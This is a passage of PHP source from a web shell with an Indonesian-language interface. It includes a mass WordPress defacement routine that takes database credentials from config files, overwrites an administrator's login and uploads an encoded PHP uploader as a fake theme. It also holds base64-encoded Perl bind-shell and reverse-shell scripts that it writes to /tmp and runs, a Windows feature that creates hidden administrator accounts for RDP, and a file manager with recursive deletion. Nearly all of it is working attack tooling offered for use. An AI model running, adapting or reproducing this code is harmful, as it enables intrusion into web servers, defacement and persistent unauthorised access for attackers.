1445. echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>-> Adminer login <-</a></font></center>";
1446. } else {
1447. echo "<center><font color=red>gagal buat file adminer</font></center>";
1448. }
1449. }
1450. } elseif($_GET['do'] == 'auto_dwp') {
1451. if($_POST['auto_deface_wp']) {
1452. function anucurl($sites) {
1453. $ch = curl_init($sites);
1454. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1455. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1456. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1457. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1458. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1459. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1460. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1461. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1462. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1463. $data = curl_exec($ch);
1464. curl_close($ch);
1465. return $data;
1466. }
1467. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1468. $post = array(
1469. "log" => "$userr",
1470. "pwd" => "$pass",
1471. "rememberme" => "forever",
1472. "wp-submit" => "$wp_submit",
1473. "redirect_to" => "$web",
1474. "testcookie" => "1",
1475. );
1476. $ch = curl_init($cek);
1477. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1478. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1479. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1480. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1481. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1482. curl_setopt($ch, CURLOPT_POST, 1);
1483. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1484. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1485. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1486. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1487. $data = curl_exec($ch);
1488. curl_close($ch);
1489. return $data;
1490. }
1491. $scan = $_POST['link_config'];
1492. $link_config = scandir($scan);
1493. $script = htmlspecialchars($_POST['script']);
1494. $user = "BSA";
1495. $pass = "BSA";
1496. $passx = md5($pass);
1497. foreach($link_config as $dir_config) {
1498. if(!is_file("$scan/$dir_config")) continue;
1499. $config = file_get_contents("$scan/$dir_config");
1500. if(preg_match("/WordPress/", $config)) {
1501. $dbhost = ambilkata($config,"DB_HOST', '","'");
1502. $dbuser = ambilkata($config,"DB_USER', '","'");
1503. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1504. $dbname = ambilkata($config,"DB_NAME', '","'");
1505. $dbprefix = ambilkata($config,"table_prefix = '","'");
1506. $prefix = $dbprefix."users";
1507. $option = $dbprefix."options";
1508. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1509. $db = mysql_select_db($dbname);
1510. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1511. $result = mysql_fetch_array($q);
1512. $id = $result[ID];
1513. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1514. $result2 = mysql_fetch_array($q2);
1515. $target = $result2[option_value];
1516. if($target == '') {
1517. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1518. } else {
1519. echo "[+] $target <br>";
1520. }
1521. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1522. if(!$conn OR !$db OR !$update) {
1523. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1524. mysql_close($conn);
1525. } else {
1526. $site = "$target/wp-login.php";
1527. $site2 = "$target/wp-admin/theme-install.php?upload";
1528. $b1 = anucurl($site2);
1529. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1530. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1531. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1532. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1533. $www = "m.php";
1534. $fp5 = fopen($www,"w");
1535. fputs($fp5,$upload3);
1536. $post2 = array(
1537. "_wpnonce" => "$anu2",
1538. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1539. "themezip" => "@$www",
1540. "install-theme-submit" => "Install Now",
1541. );
1542. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1543. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1544. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1545. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1546. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1547. curl_setopt($ch, CURLOPT_POST, 1);
1548. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1549. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1550. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1551. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1552. $data3 = curl_exec($ch);
1553. curl_close($ch);
1554. $y = date("Y");
1555. $m = date("m");
1556. $namafile = "id.php";
1557. $fpi = fopen($namafile,"w");
1558. fputs($fpi,$script);
1559. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1560. curl_setopt($ch6, CURLOPT_POST, true);
1561. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1562. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1563. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1564. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1565. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1566. $postResult = curl_exec($ch6);
1567. curl_close($ch6);
1568. $as = "$target/k.php";
1569. $bs = anucurl($as);
1570. if(preg_match("#$script#is", $bs)) {
1571. echo "[+] <font color='blue'>Berhasil mepes...</font><br>";
1572. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1573. } else {
1574. echo "[-] <font color='red'>Gagal mepes...</font><br>";
1575. echo "[!!] Coba aja manual: <br>";
1576. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1577. echo "[+] username: <font color=blue>$user</font><br>";
1578. echo "[+] password: <font color=blue>$pass</font><br><br>";
1579. }
1580. mysql_close($conn);
1581. }
1582. }
1583. }
1584. } else {
1585. echo "<center><h1>WordPress Auto Pepes</h1>
1586. <form method='post'>
1587. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1588. <input type='text' name='script' height='10' size='50' placeholder='Hacked by BSA.' required><br>
1589. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1590. </form>
1591. <br><span>NB: konTools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1592. </center>";
1593. }
1594. } elseif($_GET['do'] == 'auto_dwp2') {
1595. if($_POST['auto_deface_wp']) {
1596. function anucurl($sites) {
1597. $ch = curl_init($sites);
1598. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1599. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1600. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1601. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1602. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1603. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1604. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1605. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1606. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1607. $data = curl_exec($ch);
1608. curl_close($ch);
1609. return $data;
1610. }
1611. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1612. $post = array(
1613. "log" => "$userr",
1614. "pwd" => "$pass",
1615. "rememberme" => "forever",
1616. "wp-submit" => "$wp_submit",
1617. "redirect_to" => "$web",
1618. "testcookie" => "1",
1619. );
1620. $ch = curl_init($cek);
1621. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1622. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1623. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1624. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1625. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1626. curl_setopt($ch, CURLOPT_POST, 1);
1627. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1628. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1629. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1630. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1631. $data = curl_exec($ch);
1632. curl_close($ch);
1633. return $data;
1634. }
1635. $link = explode("\r\n", $_POST['link']);
1636. $script = htmlspecialchars($_POST['script']);
1637. $user = "BSA";
1638. $pass = "BSA";
1639. $passx = md5($pass);
1640. foreach($link as $dir_config) {
1641. $config = anucurl($dir_config);
1642. $dbhost = ambilkata($config,"DB_HOST', '","'");
1643. $dbuser = ambilkata($config,"DB_USER', '","'");
1644. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1645. $dbname = ambilkata($config,"DB_NAME', '","'");
1646. $dbprefix = ambilkata($config,"table_prefix = '","'");
1647. $prefix = $dbprefix."users";
1648. $option = $dbprefix."options";
1649. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1650. $db = mysql_select_db($dbname);
1651. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1652. $result = mysql_fetch_array($q);
1653. $id = $result[ID];
1654. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1655. $result2 = mysql_fetch_array($q2);
1656. $target = $result2[option_value];
1657. if($target == '') {
1658. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1659. } else {
1660. echo "[+] $target <br>";
1661. }
1662. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1663. if(!$conn OR !$db OR !$update) {
1664. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1665. mysql_close($conn);
1666. } else {
1667. $site = "$target/wp-login.php";
1668. $site2 = "$target/wp-admin/theme-install.php?upload";
1669. $b1 = anucurl($site2);
1670. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1671. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1672. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1673. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1674. $www = "m.php";
1675. $fp5 = fopen($www,"w");
1676. fputs($fp5,$upload3);
1677. $post2 = array(
1678. "_wpnonce" => "$anu2",
1679. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1680. "themezip" => "@$www",
1681. "install-theme-submit" => "Install Now",
1682. );
1683. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1684. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1685. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1686. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1687. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1688. curl_setopt($ch, CURLOPT_POST, 1);
1689. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1690. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1691. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1692. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1693. $data3 = curl_exec($ch);
1694. curl_close($ch);
1695. $y = date("Y");
1696. $m = date("m");
1697. $namafile = "id.php";
1698. $fpi = fopen($namafile,"w");
1699. fputs($fpi,$script);
1700. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1701. curl_setopt($ch6, CURLOPT_POST, true);
1702. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1703. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1704. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1705. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1706. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1707. $postResult = curl_exec($ch6);
1708. curl_close($ch6);
1709. $as = "$target/k.php";
1710. $bs = anucurl($as);
1711. if(preg_match("#$script#is", $bs)) {
1712. echo "[+] <font color='blue'>Berhasil mepes...</font><br>";
1713. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1714. } else {
1715. echo "[-] <font color='red'>Gagal mepes...</font><br>";
1716. echo "[!!] Coba aja manual: <br>";
1717. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1718. echo "[+] username: <font color=blue>$user</font><br>";
1719. echo "[+] password: <font color=blue>$pass</font><br><br>";
1720. }
1721. mysql_close($conn);
1722. }
1723. }
1724. } else {
1725. echo "<center><h1>WordPress Auto Pepes V.2</h1>
1726. <form method='post'>
1727. Link Config: <br>
1728. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1729. <input type='text' name='script' height='10' size='50' placeholder='Hacked by BSA.' required><br>
1730. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1731. </form></center>";
1732. }
1733. } elseif($_GET['do'] == 'network') {
1734. echo "<form method='post'>
1735. <u>Bind Port:</u> <br>
1736. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1737. <input type='submit' name='sub_bp' value='>>'>
1738. </form>
1739. <form method='post'>
1740. <u>Back Connect:</u> <br>
1741. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1742. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1743. <input type='submit' name='sub_bc' value='>>'>
1744. </form>";
1745. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1746. if(isset($_POST['sub_bp'])) {
1747. $f_bp = fopen("/tmp/bp.pl", "w");
1748. fwrite($f_bp, base64_decode($bind_port_p));
1749. fclose($f_bp);
1750.  
1751. $port = $_POST['port_bind'];
1752. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1753. sleep(1);
1754. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1755. unlink("/tmp/bp.pl");
1756. }
1757. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1758. if(isset($_POST['sub_bc'])) {
1759. $f_bc = fopen("/tmp/bc.pl", "w");
1760. fwrite($f_bc, base64_decode($bind_connect_p));
1761. fclose($f_bc);
1762.  
1763. $ipbc = $_POST['ip_bc'];
1764. $port = $_POST['port_bc'];
1765. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1766. sleep(1);
1767. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1768. unlink("/tmp/bc.pl");
1769. }
1770. } elseif($_GET['do'] == 'krdp_shell') {
1771. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1772. if($_POST['create']) {
1773. $user = htmlspecialchars($_POST['user']);
1774. $pass = htmlspecialchars($_POST['pass']);
1775. if(preg_match("/$user/", exe("net user"))) {
1776. echo "[INFO] -> <font color=red>user <font color=blue>$user</font> sudah ada</font>";
1777. } else {
1778. $add_user = exe("net user $user $pass /add");
1779. $add_groups1 = exe("net localgroup Administrators $user /add");
1780. $add_groups2 = exe("net localgroup Administrator $user /add");
1781. $add_groups3 = exe("net localgroup Administrateur $user /add");
1782. echo "[ RDP ACCOUNT INFO ]<br>
1783. ------------------------------<br>
1784. IP: <font color=blue>".$ip."</font><br>
1785. Username: <font color=blue>$user</font><br>
1786. Password: <font color=blue>$pass</font><br>
1787. ------------------------------<br><br>
1788. [ STATUS ]<br>
1789. ------------------------------<br>
1790. ";
1791. if($add_user) {
1792. echo "[add user] -> <font color='blue'>Berhasil</font><br>";
1793. } else {
1794. echo "[add user] -> <font color='red'>Gagal</font><br>";
1795. }
1796. if($add_groups1) {
1797. echo "[add localgroup Administrators] -> <font color='blue'>Berhasil</font><br>";
1798. } elseif($add_groups2) {
1799. echo "[add localgroup Administrator] -> <font color='blue'>Berhasil</font><br>";
1800. } elseif($add_groups3) {
1801. echo "[add localgroup Administrateur] -> <font color='blue'>Berhasil</font><br>";
1802. } else {
1803. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1804. }
1805. echo "------------------------------<br>";
1806. }
1807. } elseif($_POST['s_opsi']) {
1808. $user = htmlspecialchars($_POST['r_user']);
1809. if($_POST['opsi'] == '1') {
1810. $cek = exe("net user $user");
1811. echo "Checking username <font color=blue>$user</font> ....... ";
1812. if(preg_match("/$user/", $cek)) {
1813. echo "[ <font color=blue>Sudah ada</font> ]<br>
1814. ------------------------------<br><br>
1815. <pre>$cek</pre>";
1816. } else {
1817. echo "[ <font color=red>Belum ada</font> ]";
1818. }
1819. } elseif($_POST['opsi'] == '2') {
1820. $cek = exe("net user $user BSA");
1821. if(preg_match("/$user/", exe("net user"))) {
1822. echo "[change password: <font color=blue>BSA</font>] -> ";
1823. if($cek) {
1824. echo "<font color=blue>Berhasil</font>";
1825. } else {
1826. echo "<font color=red>Gagal</font>";
1827. }
1828. } else {
1829. echo "[INFO] -> <font color=red>user <font color=blue>$user</font> Belum ada</font>";
1830. }
1831. } elseif($_POST['opsi'] == '3') {
1832. $cek = exe("net user $user /DELETE");
1833. if(preg_match("/$user/", exe("net user"))) {
1834. echo "[remove user: <font color=blue>$user</font>] -> ";
1835. if($cek) {
1836. echo "<font color=blue>Berhasil</font>";
1837. } else {
1838. echo "<font color=red>Gagal</font>";
1839. }
1840. } else {
1841. echo "[INFO] -> <font color=red>user <font color=blue>$user</font> Belum ada</font>";
1842. }
1843. } else {
1844. //
1845. }
1846. } else {
1847. echo "-- Create RDP --<br>
1848. <form method='post'>
1849. <input type='text' name='user' placeholder='username' value='BSA' required>
1850. <input type='text' name='pass' placeholder='password' value='BSA' required>
1851. <input type='submit' name='create' value='>>'>
1852. </form>
1853. -- Option --<br>
1854. <form method='post'>
1855. <input type='text' name='r_user' placeholder='username' required>
1856. <select name='opsi'>
1857. <option value='1'>Cek Username</option>
1858. <option value='2'>Ubah Password</option>
1859. <option value='3'>Hapus Username</option>
1860. </select>
1861. <input type='submit' name='s_opsi' value='>>'>
1862. </form>
1863. ";
1864. }
1865. } else {
1866. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1867. }
1868. } elseif($_GET['act'] == 'newfile') {
1869. if($_POST['new_save_file']) {
1870. $newfile = htmlspecialchars($_POST['newfile']);
1871. $fopen = fopen($newfile, "a+");
1872. if($fopen) {
1873. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1874. } else {
1875. $act = "<font color=red>permission denied</font>";
1876. }
1877. }
1878. echo $act;
1879. echo "<form method='post'>
1880. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1881. <input type='submit' name='new_save_file' value='Submit'>
1882. </form>";
1883. } elseif($_GET['act'] == 'newfolder') {
1884. if($_POST['new_save_folder']) {
1885. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1886. if(!mkdir($new_folder)) {
1887. $act = "<font color=red>permission denied</font>";
1888. } else {
1889. $act = "<script>window.location='?dir=".$dir."';</script>";
1890. }
1891. }
1892. echo $act;
1893. echo "<form method='post'>
1894. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1895. <input type='submit' name='new_save_folder' value='Submit'>
1896. </form>";
1897. } elseif($_GET['act'] == 'rename_dir') {
1898. if($_POST['dir_rename']) {
1899. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1900. if($dir_rename) {
1901. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1902. } else {
1903. $act = "<font color=red>permission denied</font>";
1904. }
1905. echo "".$act."<br>";
1906. }
1907. echo "<form method='post'>
1908. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1909. <input type='submit' name='dir_rename' value='rename'>
1910. </form>";
1911. } elseif($_GET['act'] == 'delete_dir') {
1912. if(is_dir($dir)) {
1913. if(is_writable($dir)) {
1914. @rmdir($dir);
1915. @exe("rm -rf $dir");
1916. @exe("rmdir /s /q $dir");
1917. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1918. } else {
1919. $act = "<font color=red>could not remove ".basename($dir)."</font>";
1920. }
1921. }
1922. echo $act;
1923. } elseif($_GET['act'] == 'view') {
1924. echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Ngedit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Donlot</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br>";
1925. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1926. } elseif($_GET['act'] == 'edit') {
1927. if($_POST['save']) {
1928. $save = file_put_contents($_GET['file'], $_POST['src']);
1929. if($save) {
1930. $act = "<font color=blue>Saved!</font>";
1931. } else {
1932. $act = "<font color=red>permission denied</font>";
1933. }
1934. echo "".$act."<br>";
1935. }
1936. echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Donlot</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br>";
1937. echo "<form method='post'>
1938. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1939. <input type='submit' value='Save' name='save' style='width: 500px;'>
1940. </form>";
1941. } elseif($_GET['act'] == 'rename') {
1942. if($_POST['do_rename']) {
1943. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1944. if($rename) {
1945. $act = "<script>window.location='?dir=".$dir."';</script>";
1946. } else {
1947. $act = "<font color=red>permission denied</font>";
1948. }
1949. echo "".$act."<br>";
1950. }
1951. echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Ngedit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>Rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Donlot</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br>";
1952. echo "<form method='post'>
1953. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1954. <input type='submit' name='do_rename' value='rename'>
1955. </form>";
1956. } elseif($_GET['act'] == 'delete') {
1957. $delete = unlink($_GET['file']);
1958. if($delete) {
1959. $act = "<script>window.location='?dir=".$dir."';</script>";
1960. } else {
1961. $act = "<font color=red>permission denied</font>";
1962. }
1963. echo $act;
1964. } else {
1965. if(is_dir($dir) === true) {
1966. if(!is_readable($dir)) {
1967. echo "<font color=red>Nggak bisa buka directory. ( not readable )</font>";
1968. } else {
1969. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1970. <tr>
1971. <th class="th_home"><center>Name</center></th>
1972. <th class="th_home"><center>Type</center></th>
1973. <th class="th_home"><center>Size</center></th>
1974. <th class="th_home"><center>Last Modified</center></th>
1975. <th class="th_home"><center>Owner/Group</center></th>
1976. <th class="th_home"><center>Permission</center></th>
1977. <th class="th_home"><center>Action</center></th>
1978. </tr>';
1979. $scandir = scandir($dir);
1980. foreach($scandir as $dirx) {
1981. $dtype = filetype("$dir/$dirx");
1982. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1983. if(function_exists('posix_getpwuid')) {
1984. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1985. $downer = $downer['name'];
1986. } else {
1987. //$downer = $uid;
1988. $downer = fileowner("$dir/$dirx");
1989. }
1990. if(function_exists('posix_getgrgid')) {
1991. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1992. $dgrp = $dgrp['name'];
1993. } else {
1994. $dgrp = filegroup("$dir/$dirx");
1995. }
1996. if(!is_dir("$dir/$dirx")) continue;
1997. if($dirx === '..') {
1998. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1999. } elseif($dirx === '.') {
2000. $href = "<a href='?dir=$dir'>$dirx</a>";
2001. } else {
2002. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2003. }
2004. if($dirx === '.' || $dirx === '..') {
2005. $act_dir = "<a href='?act=newfile&dir=$dir'>NewFile</a> | <a href='?act=newfolder&dir=$dir'>NewFolder</a>";
2006. } else {
2007. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>Rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>Hapus</a>";
2008. }
2009. echo "<tr>";
